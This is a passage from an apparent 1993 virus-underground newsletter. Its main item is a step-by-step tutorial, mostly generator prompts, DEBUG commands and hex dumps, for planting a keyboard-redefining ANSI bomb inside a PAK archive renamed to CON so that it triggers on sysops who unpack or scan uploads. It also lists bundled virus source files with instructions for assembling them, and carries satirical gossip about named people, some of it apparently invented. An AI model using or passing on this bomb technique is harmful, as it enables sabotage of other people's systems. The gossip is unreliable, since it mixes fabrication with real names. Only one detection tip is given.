  780.        hiring.  It had, she said.  "I don't like the word
  781.        'down-sizing'," she said with a glassy smile. "We
  782.        call it 'right-sizing.'"
  783.  
  784.        Fields said she couldn't say whether the agency's "right-
  785.        sizing" involves cuts in 60 percent of prospective
  786.        hires, as had been recently reported in national newspapers.
  787.        But then she changed her mind and commented, "That's a little
  788.        high."
  789.  
  790.        This has created problems for the agency, she said. Since
  791.        attrition isn't removing veterans at the expected rate,
  792.        it's been difficult to bring in new people she added.
  793.        Complicating matters is the polygraph and security check.
  794.        "Eighty to 90 percent of the people to which the agency
  795.        makes an offer fail it."
  796.  
  797.        As for where I fit into things, interest was from the
  798.        China Division: Industry & Technology branch of the
  799.        office.
  800.  
  801.        "The section head's not here today," said Fields.  "But
  802.        Ken Sawka will speak with you."
  803.  
  804.        Ken Sawka turned out to be an airy, blond-haired analyst
  805.        with a master's degree in international relations from
  806.        American University. 
  807.        
  808.        "What did you say your name was?" he asked as we walked
  809.        down the hall to his boss's empty office.
  810.  
  811.        Sawka didn't have my resume, my PHS or any information on
  812.        my scientific background, the reason I was being interviewed,
  813.        so he didn't ask any questions, preferring instead to
  814.        talk about himself.
  815.  
  816.        How many scientists are currently working in the office,
  817.        I finally asked.
  818.  
  819.        "None," Sawka said.  "That's why we're trying to look at
  820.        some."
  821.  
  822.        The agency, Sawka said, made up for this lack by sending
  823.        analysts to seminars on topics the various departments
  824.        may have to deal with, such as ballistic missile technology.
  825.        Sawka added he was glad he had finally learned what an
  826.        accelerometer was and how integral design is to ballistic
  827.        missile development.
  828.  
  829.        I asked Sawka about the polygraph screening and nature of
  830.        the psychological testing.
  831.  
  832.        He laughed nervously but said, "Everybody has to go through
  833.        it and it's not any fun.  But security believes very
  834.        strongly in it and the agency works hard to get candidates
  835.        through the lie-detector.  We allow them to take it three
  836.        times."
  837.  
  838.        At the end of the interview, Fields asked me to take some
  839.        "stuff" over the Stafford Building for her when I went there
  840.        to collect travel expenses.  A moment later she thought better
  841.        of it, but supplied me with directions anyway.
  842.  
  843.        Outside the Stafford Building later in the day were more harried
  844.        smokers.  Inside I asked for gas money ($20) and mileage.
  845.        A CIA worker insisted that this be compared against the price
  846.        of the lowest airline ticket from Philadelphia.  I argued
  847.        that this was ridiculous, to no avail.
  848.  
  849.        As predicted, a telephone call to a CIA airline-ticket specialist
  850.        came up with a figure far in excess of the gas money.  The
  851.        agent then gave me a little more than $200 of the taxpayer's
  852.        money, a generous per diem, and mileage allowance.
  853.        The hotel room had been paid in advance.
  854.  
  855.        A call to Field's office a few days later elicited the
  856.        information that in East Asian Analysis, there were no
  857.        job openings and no hiring plans.
  858.  
  859.        When I asked why, in that case, the testing and interviewing,
  860.        no one had an answer except to say "the agency has to plan
  861.        for every contingency."
  862.  
  863.        ARISTOTLE'S STUPID ANSI BOMB TRICKS or DON'T UNPAK THAT PAK!!!
  864.  
  865.  
  866.  
  867.     The latest craze to hit the virus scene is the use of the old
  868.     ANSI bomb in PAKed CON file. Perfected in the Ukraine by an
  869.     ancient soothe sayer of soothe that needeth saying, this tiny
  870.     non-conformity packs a whallop! Just ask the folks at McAfee's
  871.     who alledgedly took a nukeage from one. Why all the hub-bub
  872.     about them? Well, I'll tell ya! It seems that the redirected
  873.     keyboard trick still works when deployed from the CON device into
  874.     a target rich environment. Unwary sysops who utilize the new
  875.     comforts of auto-scanning their uploads are learning that the
  876.     risk of a serious nukeage still exists. So that you may better
  877.     understand how this function works, I have laid out a little
  878.     example;
  879.  
  880.     Make and ANSI bomb with the TJA-ANSI bomb creator from RABiD.
  881.     (Hopefully, Dr. Kouch included it in this issue of the CRyPT
  882.     NEWLETTER... If not, BITCH!) I have included the displays so
  883.     you will be able to have a full explanation of what is going
  884.     on. (Trust me! If you can't follow this program *WITHOUT* the
  885.     following eaxmples, you don't need to be using a computer in
  886.     the first place.
  887.     ────────────────────────────────────────────────────────────
  888.     ════════════════════════════════════════════════════════════
  889.     THE ANSI BOMB GENERATOR 1.03ß (C)1990 by The Jolly Anarchist
  890.     ════════════════════════════════════════════════════════════
  891.  
  892.                   MAIN MENU
  893.                   ═════════
  894.  
  895.              [A]  Create An Ansi Bomb
  896.  
  897.              [B]  Add A Bomb To A File
  898.  
  899.              [C]  Information/Help
  900.  
  901.              [D]  Exit to DOS
  902.  
  903.                 Your Choice?
  904.     ────────────────────────────────────────────────────────────
  905.  
  906.  
  907.     Obviously, you want to create the thing at this point :)
  908.     So choose "A"
  909.  
  910.     Simply pressin the <Space Bar> will insert the desired key that
  911.     you wish to redefine...
  912.     ────────────────────────────────────────────────────────────
  913.     Enter Key to Re-Define  : 32
  914.  
  915.     Please Re-Enter the Key : 32
  916.  
  917.     Continue?
  918.     ────────────────────────────────────────────────────────────
  919.  
  920.  
  921.     Once you've chosen your key, the next thing you will need to do
  922.     is name the program you want executed when the bomb goes off.
  923.     ────────────────────────────────────────────────────────────
  924.     Enter Your Sequence Below.  You may not backspace, so GET IT RIGHT!
  925.     Type: '/S' to save, '/A' to abort, '/R' to Restart, '?' for help
  926.     ═══════════════════════════════════════════════════════════════════
  927.     DIR
  928.  
  929.     Save Sequence?
  930.     ────────────────────────────────────────────────────────────
  931.  
  932.  
  933.     Of course you save the silly thing! Follow the remaining prompts
  934.     and use that growth on your shoulders to answer the prompts.
  935.     ────────────────────────────────────────────────────────────
  936.                    {--------}
  937.     Enter a Name for this Bomb:  TEST
  938.  
  939.                    {--------------------------------}
  940.     Enter a Description for this bomb:  EXAMPLE  FOR CRyPT
  941.     ────────────────────────────────────────────────────────────
  942.  
  943.  
  944.  
  945.     Aside from the free plug for the CRyPT Newsletter, the only
  946.     remaining thing to do in this program is to add the bomb to
  947.     an ANSI file, or simply leave it as it is and let the program
  948.     create one for you.
  949.     ────────────────────────────────────────────────────────────
  950.     File to Add Bomb to:  LOGO.ANS
  951.     Bombs Available :
  952.                   TEST
  953.               {--------}
  954.     Bomb to add:  TEST
  955.     ────────────────────────────────────────────────────────────
  956.  
  957.  
  958.     Next you'll see...
  959.     ────────────────────────────────────────────────────────────
  960.     Add Bomb to then [B]eginning or the [E]nd of the file?
  961.     ────────────────────────────────────────────────────────────
  962.     I have found that if you add this little critter to the end of
  963.     the file, the entire ANSI will display whereas at the beginning
  964.     of the file, the ANSI may never appear. Anyhow, you now have a
  965.     file named TEST or LOGO.ANS that contains the strings for an
  966.     ANSI bomb that look something like this;
  967.  
  968.                  68;73;82;13p
  969.  
  970.     The way it reads is,  SPACEBAR is redefined to 13p <RETURN>
  971.     So, what it will do is type ;68="D", ;73="I", ;82="R". (That's
  972.     DIR, for the mentally impaired) It can be anything, but for
  973.     this example and to be non-destructive, we'll use DIR. When
  974.     the unsuspecting SySop opens the file and the contents of the
  975.     CON file inside the .PAK file are expanded, the trigger is set.
  976.     A simple touch to the spacebar will yield nasty results. Here
  977.     though, you'll only see your smutty .GIF collection jump up at
  978.     you.
  979.  
  980.     Questions that will arise...
  981.     Er, uh! Gee, Mr. ARiSToTLE, How do I get the ANSI bomb inside
  982.     the .PAK file???
  983.  
  984.     Well, I'll tell ya!
  985.  
  986.     Take your little creation and rename it to "YON" with no
  987.     extension. At the command line, create a .PAK file by typing
  988.  
  989.        PAK A TEST YON
  990.  
  991.     You will immediately see Mr. PAK sucking up the file...
  992.     Once it is all sucked up inside, this is where it gets fun!
  993.  
  994.     Again, at the command line, type;
  995.  
  996.        DEBUG TEST.PAK
  997.  
  998.     You will see a single "-" waiting for some input. Type;
  999.  
  1000.        D 0100
  1001.  
  1002.     This will list the first chunk of code in TEST.PAK and depending
  1003.     on the version you have, you should see something like this;
  1004.  
  1005. -
  1006. 2EC7:0100  1A 02 59 4F 4E 00 46 72-11 00 00 00 14 15 13 11   ..YON.Fr........
  1007. 2EC7:0110  00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33   .....Y|9".....[3
  1008. 2EC7:0120  32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00   2;68;73;82;13p..
  1009. 2EC7:0130  FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF   ..............P.
  1010. 2EC7:0140  36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85   6...............
  1011. 2EC7:0150  F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E   .t...."......1.^
  1012. 2EC7:0160  C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74   .1.P1.P1.P.:.<.t
  1013. 2EC7:0170  AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04   ......V...;...~.
  1014. -
  1015.     In the first line, you see where it says YON.Fr? I sure hope so
  1016.     or I'm spinning my wheels here... Now you will type;
  1017.  
  1018.        E 0102 'C'
  1019.        W
  1020.        Q
  1021.  
  1022.     Reason being, the 'Y' occupies that location and you want to
  1023.     replace the 'Y', with a 'C', so that it spells 'CON".
  1024.  
  1025.     'W' will tell DEBUG to write it.
  1026.     'Q' will take you back to DOS.
  1027.  
  1028.     Ah gee, Mr. Wizard... It changed!!!
  1029.  
  1030. -
  1031. 2EC7:0100  1A 02 43 4F 4E 00 46 72-11 00 00 00 14 15 13 11   ..CON.Fr........
  1032. 2EC7:0110  00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33   .....Y|9".....[3
  1033. 2EC7:0120  32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00   2;68;73;82;13p..
  1034. 2EC7:0130  FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF   ..............P.
  1035. 2EC7:0140  36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85   6...............
  1036. 2EC7:0150  F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E   .t...."......1.^
  1037. 2EC7:0160  C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74   .1.P1.P1.P.:.<.t
  1038. 2EC7:0170  AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04   ......V...;...~.
  1039. -
  1040.  
  1041.     Well, that's about it! Easy as falling off a log, eh?...
  1042.     *REMEMBER* to PAK up the executable you wish to have
  1043.     executed or all this information will have been for naught!
  1044.  
  1045.     Ah, you know I can't leave it like this . . .
  1046.     Let me give you a quick run down on how to prevent this
  1047.     from happening to you . . .
  1048.  
  1049.     Simply use the HEX codes that are representive of;
  1050.  
  1051.                 ;13p
  1052.  
  1053.     and insert them into F-PROT's user defined area. Then scan
  1054.     your .PAKs, .TXTs, and anything else that can be typed . . .
  1055.  
  1056.     Till next time,
  1057.  
  1058.     -----ARiSToTLE
  1059.  
  1060.  
  1061.        [In related news, the PAK-bomb described above has been
  1062.        attributed to a wave BBS crashes in Oklahoma, according to Lee
  1063.        Jackson's latest Hack Report.
  1064.  
  1065.        Since the bomb is stored within the archive under the filename
  1066.        CON - it is a "device" bomb, rather than a standard ANSI
  1067.        bomb.  "Turning off ANSI comments in PKZIP or other unpackers won't
  1068.        stop it . . .  unpacking the file causes the device CON to
  1069.        be opened, and the bomb is written straight to it as a result,"
  1070.        says The Hack Report, which is as good an explanation as
  1071.        any.]
  1072.  
  1073.        FICTUAL FACT/FACTUAL FICTION:  THERE'S NO SECOND CHANCE WHEN
  1074.        DEADLY KUNG FU IS USED FOR EVIL!
  1075.  
  1076.        >>Urnst Kouch stupidly referred to NuKE virus-programmer Rock Steady
  1077.        as French-Canadian in a recent issue of "Gray Areas" magazine.
  1078.        The newsletter regrets this deplorable "ugly Americanism" and
  1079.        is sorry for any mental anguish it may have caused.  Rock Steady
  1080.        is not, nor has he ever been, French Canadian.
  1081.  
  1082.        >>The immortal words of the SF Bay Area punk band FANG, "And you'll
  1083.        have to admit, that I'll be rich as shit!" from it's song,
  1084.        "The Money Will Roll Right In" could be applied to John
  1085.        McAfee these days.
  1086.  
  1087.        From a recent business report:
  1088.  
  1089.        "Risk of Viruses
  1090.  
  1091.     Given the Company's high profile in the anti-virus software market,
  1092.     the Company has been a target of computer "crackers" who have
  1093.     created viruses to sabotage the Company's products.  While to date
  1094.     these viruses have been discovered quickly and their dissemination
  1095.     limited, there can be no assurance that similar viruses will not
  1096.     be created in the future, that they will not cause damage to
  1097.     users' computer systems and that demand for the Company's software
  1098.     products will not suffer as a result.  In addition, since the
  1099.     Company does not control diskettes duplication by shareware
  1100.     distributors or its independent agents, there is no assurance
  1101.     that diskettes containing the Company's software will not be infected.
  1102.  
  1103.  
  1104.     The current list price for a 1,000 computer VIRUSCAN site license
  1105.     is $7,125
  1106.  
  1107.     The current list price for a 1,000 computer CLEAN-UP site license
  1108.     is $8,910
  1109.  
  1110.     The current list price for a 1,000 computer VSHIELD site license
  1111.     is $8,910
  1112.  
  1113.  
  1114.     Revenue for the second quarter of 1993 were $4,340,000, a 28%
  1115.     increase over revenues for the second quarter of the previous year.
  1116.     Net income for the second quarter of 1993 was $1,961,000, a 26%
  1117.     increase over pro forma net income for the second quarter of 1992."
  1118.  
  1119.     Crypt Newsletter financial analyst Cando estimates the following:
  1120.  
  1121.     "John is taking home a base salary of $250,000 and cashed out at
  1122.     the public offering for . . . hold on to your pants . . . a
  1123.     whopping $8,400,000 cash money! McAfee still owns 4,475,000 shares
  1124.     of stock.
  1125.  
  1126.     "Every new virus that is perceived as a threat to Fortune 100
  1127.     companies will only put more cash into McAfee's pocket.  Maybe it's
  1128.     time for NuKE to cash in on some of this corporate fisc?"
  1129.  
  1130.     >>Freshly weaned "cyberpunk" Billy Idol has been deemed a wuss
  1131.     by the computer underground. His recent release, "Cyberpunk," has
  1132.     earned praise from the computer underground along the lines of
  1133.     "He makes lots of money producing meaningless noise. We have to
  1134.     bash him.  It's the great American past-time."  This summer, Idol
  1135.     has had better luck with hookers than hi-tech computing, being
  1136.     unable to distance himself from Hollywood infame after being
  1137.     linked to "madame-to-the stars-and-assorted-perverted-rich-
  1138.     coke-snuffling-studio-execs" Heidi Fleiss.  Fleiss has
  1139.     been associated/seen with Idol, movie producers with a taste for
  1140.     defecating upon dates and an "east coast" computer entrepeneur
  1141.     who likes to use horsewhips. Call Leisure Suit Larry!
  1142.  
  1143.     >>CARO member Vesselin Bontchev and Bulgarian virus programmer,
  1144.     The Dark Avenger, have teamed up in an effort to sell the
  1145.     movie rights to their first hi-tech screenplay, "The Swizzler."
  1146.     "The Swizzler," now being flogged to various agents in Burbank,
  1147.     CA, is a high-tech thriller set in the near future where a
  1148.     mysterious computer virus called "The Swizzler" has decimated the
  1149.     world's banking institutions after escaping from a laboratory
  1150.     in Los Alamos, NM.  With America on its knees, the Computer
  1151.     Emergency Response Team rushes on an overnite jet to Bettguano,
  1152.     Bulgaria, to recruit the Avenger (playing himself) in a last
  1153.     ditch race against the clock to halt "The Swizzler" before the
  1154.     computer scourge activates and sends the Doomsday launch codes
  1155.     to the ICBM fields. Bontchev and The Dark Avenger also flew
  1156.     to Cannes, sponsored by the Bulgarian bubbly wine company
  1157.     Champipple, for a press the flesh campaign.
  1158.  
  1159.     >>The Dutch virus research group, TridenT, is working on a
  1160.     new electronic magazine, tentatively named "TridenTial".
  1161.     This, in the face of new "anti-virus" legislation in the
  1162.     low country which makes it possible to prosecute those
  1163.     proven to be trading computer viruses without "educational"
  1164.     permit.  Look for TridenTial soon and stay tuned to this
  1165.     channel.
  1166.  
  1167.  
  1168.                    *CAVEAT EMPTOR*
  1169.  
  1170.     What is the Crypt Newsletter?  The Crypt Newsletter is an electronic
  1171.     document which delivers deft satire, savage criticism and media
  1172.     analyses on topics of interest to the editor and the computing
  1173.     public.  The Crypt Newsletter also reviews anti-virus and
  1174.     security software and republishes digested news of note to
  1175.     users of such.  The Crypt Newsletter ALSO supplies analysis and
  1176.     complete source code to many computer viruses made expressly for
  1177.     the newsletter. Source codes and DEBUG scripts of these viruses
  1178.     can corrupt - quickly and irreversibly - the data on an
  1179.     IBM-compatible microcomputer - particularly when handled
  1180.     imperfectly. Ownership of The Crypt Newsletter can damage
  1181.     your reputation, making you unpopular in heavily institutionalized
  1182.     settings, rigid bureaucracy or environments where unsophisticated,
  1183.     self-important computer user groups cohabit.
  1184.  
  1185.     Files included in this issue:
  1186.  
  1187.           CRPTLT.R17 - this electronic document
  1188.           TEST.PAK - Aristotle's PAK "device" bomb demonstrator
  1189.           TREKWAR.ASM - TREKWAR source code 
  1190.           YB-X.ASM - YB/Dick Manitoba virus source code and analysis
  1191.           CLUST.ASM - TridenT Cluster virus, advanced stealth
  1192.           example, and analysis
  1193.           VECTOR.ASM - Kohntark's interrupt vector lister utility,
  1194.           in source code
  1195.           YB-X.SCR - scriptfile for YB
  1196.           TREKWAR.SCR - scriptfile for TREKWAR
  1197.           CLUST.SCR - scriptfile for CLUSTER
  1198.           VECTOR.SCR - scriptfile for Kohntark's vector lister
  1199.  
  1200.  
  1201.      To assemble programs in the newsletter directly from scriptfiles,
  1202.      copy the MS-DOS program DEBUG.EXE to your work directory and
  1203.      type:
  1204.  
  1205.         DEBUG <*.scr
  1206.  
  1207.      where *.scr is the scriptfile of interest included in this issue.
  1208.     -------------------------------------------------------------------
  1209.  
  1210.  
  1211.        So you like the newsletter?  Maybe you want more?  Maybe you
  1212.        want to meet the avuncular Urnst Kouch in person!  You can
  1213.        access him at ukouch@delphi.com, as well as at Crypt InfoSystems:
  1214.        818-683-0854/14.4.
  1215.  
  1216.       Send all contributions to
  1217.  
  1218.       Other fine BBS's which stock the newsletter are:
  1219.  
  1220.  
  1221.     MICRO INFORMATION SYSTEMS SERVICES  1-805-251-0564
  1222.     THE HELL PIT     1-708-459-7267
  1223.     DRAGON'S DEN     1-215-882-1415
  1224.     RIPCO ][         1-312-528-5020
  1225.     AIS           1-304-480-6083
  1226.     CYBERNETIC VIOLENCE      1-514-425-4540
  1227.     THE BLACK AXIS/VA. INSTITUTE OF VIRUS RESEARCH   1-804-599-4152
  1228.     UNPHAMILIAR TERRITORY    1-602-PRI-VATE
  1229.     THE OTHER SIDE     1-512-618-0154
  1230.     REALM OF THE SHADOW      1-210-783-6526
  1231.     THE BIT BANK     1-215-966-3812
  1232.     DIGITAL DECAY    1-714-871-2057
  1233.  
  1234.  
  1235.     *********************************************************************
  1236.     Comment within the Crypt Newsletter is copyrighted by Urnst Kouch,
  1237.     1993.  If you choose to reprint sections of it for your own use,
  1238.     you might consider contacting him as a matter of courtesy.
  1239.     *********************************************************************
  1240.  
  1241.